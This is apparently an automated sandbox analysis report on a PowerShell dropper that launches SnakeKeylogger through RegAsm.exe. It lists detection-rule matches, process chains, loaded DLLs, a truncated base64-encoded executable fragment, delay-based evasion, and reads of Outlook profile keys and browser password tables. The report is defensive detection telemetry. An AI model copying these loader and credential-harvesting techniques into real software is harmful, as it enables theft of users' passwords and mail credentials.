Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7856, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: x.exe.0.dr | Static PE information: Section: 9z.85d ZLIB complexity 1.000380797955975
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winPS1@9/7@3/3
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd5iwhm4.eja.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: RegAsm.exe, 00000006.00000002.3758762382.00000000041FD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: foreign.ps1 | Virustotal: Detection: 47%
            Source: foreign.ps1 | ReversingLabs: Detection: 40%
            Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\foreign.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Binary string: BVZXCH33.pdb source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
            Source: Binary string: BVZXCH33.pdb\f source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

            Data Obfuscation

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAK
            Source: x.exe.0.dr | Static PE information: 0x89EBFCA9 [Wed Apr 29 18:17:13 2043 UTC]
            Source: x.exe.0.dr | Static PE information: section name: 9z.85d
            Source: x.exe.0.dr | Static PE information: section name:
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C73B0 push 5D906C79h; ret 6_2_066C73D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C71F8 push 5D906C79h; ret 6_2_066C7383
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A3E537 push es; ret 6_2_06A3E540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A3E543 push es; ret 6_2_06A3E544
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A3616D push esp; ret 6_2_06A361A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A37640 push esp; ret 6_2_06A3764D
            Source: x.exe.0.dr | Static PE information: section name: 9z.85d entropy: 7.997773377752887
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2BE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2CA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 52B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 62B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 63E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 73E0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 1410000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 31D0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 2E70000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599671
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599559
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599444
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599217
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 599104
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598787
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598649
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598421
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598312
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598203
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 598093
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597984
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597871
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597526
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597406
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597297
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597184
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 597062
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596953
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596843
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596625
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596515
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596406
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596297
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596186
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 596078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595968
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595531
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595421
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595312
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595203
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 595093
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594984
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594875
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594759
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594526
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594294
